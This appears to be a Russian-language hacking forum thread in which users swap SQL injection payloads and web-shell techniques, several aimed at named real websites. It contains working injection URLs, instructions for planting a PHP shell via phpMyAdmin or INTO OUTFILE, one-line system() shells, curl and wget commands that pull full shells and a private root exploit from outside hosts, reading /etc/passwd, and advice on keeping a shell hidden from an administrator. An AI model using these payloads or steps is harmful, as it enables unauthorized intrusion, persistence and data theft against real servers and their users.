http://www.cggeorgallis.com/products.php?cid=(select+1+from+(select+count(0),c oncat((select+version()),floor(rand(0)*2))+from+pr oducts+group+by+2+limit+1)a)--+&lid=2&mnID=12&pageNum_getCategoryProducts=1


4.1.22-standard-log

подскажите как с помощью curl файл на сервер залить ?

если ты о пхп - php.net, если ты о качалке -
http://www.google.com.ua/search?hl=ru&safe=off&q=man+curl&meta=&aq=0&aqi=g6&aql=&oq=%D1%8C%D1%84%D1%82+%D1%81%D0%B3%D0%BA&gs_rfai=

но если лень, тогда
curl -O sploent http://antochat.re/priv8/root_spl

если ты о пхп - , если ты о качалке -


но если лень, тогда


он говорит об аплоаде на сервер по http, наверное

Как через sql инъекцию выполнить команду, и просмотреть phpinfo ? Допустим при таком запросе: http://site.ru/index.php?id=-1+union+select+1,2,3-- принтабельный столбец 2.

Как через sql инъекцию выполнить команду, и просмотреть phpinfo ? Допустим при таком запросе: http://site.ru/index.php?id=-1+union+select+1,2,3-- принтабельный столбец 2.

http://site.ru/index.php?id=-1+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name='phpinfo'+--+
Если я правильно понял :).

CyberHunter, спасибо. А так же можно выполнять любой пхп код?

CyberHunter, спасибо. А так же можно выполнять любой пхп код?
Насколько я знаю, - нет. Для этого надо найти админку.

Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают.
Жду предложений.

http://site.ru/index.php?id=-1+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name='phpinfo'+--+
Если я правильно понял :).
O_o WTF ????
Убедительная просьба, если не понимаешь о чём речь, не нужно советов. Судя по твоим постам, просто - не нужно советов!

a1ertso
Никак в мускуле не выполнить комманду.
Продвинутые базы позволяют выполнять, но не php код, а системные комманды, как зависит от оси и базы, но в 99% случаев это сделать не удастся из-за прав.

O_o WTF ????
Убедительная просьба, если не понимаешь о чём речь, не нужно советов. Судя по твоим постам, просто - не нужно советов!

a1ertso
Никак в мускуле не выполнить комманду.
Продвинутые базы позволяют выполнять, но не php код, а системные комманды, как зависит от оси и базы, но в 99% случаев это сделать не удастся из-за прав.


Ну MySQL тоже можно внести в список этих продвинутых баз =)
Вспомни sql-бэкдор под Win.

хм...как можно на сервер загрузить файл, если при использовании wget и curl пишется premission denied, на на get и fetch - command not found ? есть еще способы ?

Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают.
Жду предложений по этому поводу. :rolleyes:

Есть залитый через локальный инклуд шелл на сервере (WSO 2.4), при попытке просмотреть исходный код файлов, либо содержимое папок, а так же при нажатии на какие либо кнопки, выкидывает на главную страницу сайта, safe mod - off. Что это может быть?

Есть залитый через локальный инклуд шелл на сервере (WSO 2.4), при попытке просмотреть исходный код файлов, либо содержимое папок, а так же при нажатии на какие либо кнопки, выкидывает на главную страницу сайта, safe mod - off. Что это может быть?

скорее всего нехватает прав...

а у меня такой вопрос как залить шелл через phpmyadmin желательно подробно...

а у меня такой вопрос как залить шелл через phpmyadmin желательно подробно...
Cоздаем таблицу, например 'hack' с колонкой 'shell'
CREATE TABLE 'hack' ('shell' TEXT);
Записываем в базу скрипт который должен инклудить шелл с сервера
INSERT INTO 'hack' ('shell') VALUES ('<? include 'http://сервер с шеллом' ?>');
Ищем папку с правами на запись uploads,images,etc.
Подставляем путь в запрос: SELECT shell FROM 'hack' INTO OUTFILE '/home/сайт/www/uploads/shell.php';

SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php';

www.site.com/shel.php?cmd=ls
shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt
shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt
shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php
shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt

путь нужен полюбом

SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php';

www.site.com/shel.php?cmd=ls
shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt
shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt
shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php
shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt

путь нужен полюбом
ну да, но меня интересовало как залить шелл именно через phpmyadmin.
спсасибо но я уже разобрался:) просто ты похоже описал как залить шелл через сиквел инжекцию...

кстати единственное с чем возникла трудность при заливке так это синтаксис:)
select * from 'table' into outfile 'путь' -не правильно
select * from `table` into outfile 'путь' -так правильно
а весь прикол в кавычках оказалсо:)

ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...
как можно по другому остатся в системе?

ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...как можно по другому остатся в системе?
Возможно на сервере кроном гоняеться скрипт, который дропает файлы по дате создания и весу.

Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают.
Жду предложений по этому поводу. :rolleyes:
O_o а по человечески можешь объяснить?

547 ты не прав, я описал именно как залить шелл через пхпмайадмин, обращатся все равно через БД, поэтому и синтаксис одинаковый, я не раз заливал через пхпадмина именно так, конечно нужен юзер рут и папка с правами на запись и соответсвенно сам путь до папки.

а по поводу как спрятать шелл от злобного админа есть способ который описал Dimi4 ..вот собственно и link (http://forum.antichat.ru/thread151993-freebsd+root.html)
смотри в самом низу статьи

']O_o а по человечески можешь объяснить?Что еще объяснять? Есть аккаунты модератора на двух форумах- vbulletin 4.0.2 и vbulletin 3.8.5. Нужно залить шелл. Старые баги с заливкой через предупреждения и репутацию- не работают. :(

как раскручивать скули, если значение не int ?
например,
view_all.php?part=analit'

ошибка :

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/admin/www/view_all.php on line 44

Warning: Division by zero in /usr/home/admin/www/view_all.php on line 250

Warning: Division by zero in /usr/home/admin/www/view_all.php on line 251

как раскручивать скули, если значение не int ?
например,
view_all.php?part=analit'

Так же как и всегда.

---

обычная инъекция,делаю выборку паролей юзеров и получаю записи вида


и т.п. я так понимаю это в каком-то бинарном виде или что? как получить в норм виде?


для начала, узнать алгоритм шифрования

ребят, хочу залить шелл посредством SQL, а именно:

union+select+1,'<?php код вашего шелла ?>',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*

php код вашего шелла - сюда не вариант ведь пихать весь код, например, шелла от madnet'a.
Посоветуйте, какой "мини" шелл или команду выполнить там, чтобы потом можно было залить полноценный шелл?

<?
echo "<pre>";
system($_GET["id"]);
echo "</pre>";
?>

вот и весь шелл)))

<? system($_GET[cmd]); ?>

нашел sql уязвимость

выдает ошибку
SQL query SELECT * FROM mobiticket.structure_page WHERE tag = '595'' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'active'' at line 3

после SELECT * FROM mobiticket.structure_page WHERE tag = '595'' идет AND

до AND сработает union? /* не обрыв строки? спасибо!

http://themood.ru/index.php?pr=15'
Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!

http://themood.ru/index.php?pr=15'
Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!

http://themood.ru/index.php?pr=1500+union+select+1,2,3,concat(versio n(),0x3a,user(),0x3a,database()),5,6

обычная инъекция,делаю выборку паролей юзеров и получаю записи вида


и т.п. я так понимаю это вроде в бинарном виде или что? уже видел записи в таком виде в других базах
Это скорее всего результат действия AES_ENCRYPT() или аналогов. Без доступа к сорсу точно не узнать (хотя можно попробовать посмотреть на свой пасс в надежде, что криптуется каким-нибудь маленьким постоянным словом).

PS А ну и естественно выводить через ascii()

проверяю на запись и пытаюсь записать так:
union+select+file_priv+from+mysql.user+where+user= 'имя юзера'
union+select+LOAD_FILE('/etc/passwd')+from+mysql.user

если на сайте таблика, где хранятся логин;пароль называется не user, то подставляю в запрос то которое на сайте? А если там нет данных о "текущем" юзвери, что делать?


например как быть тут
http://www.stmaryslutterworth.org/pages/main.php?id=-32+union+select+file_priv,2,3,4+from+mysql.user+wh ere+user='stmary_stmary'--

тут ведь нет таблицы user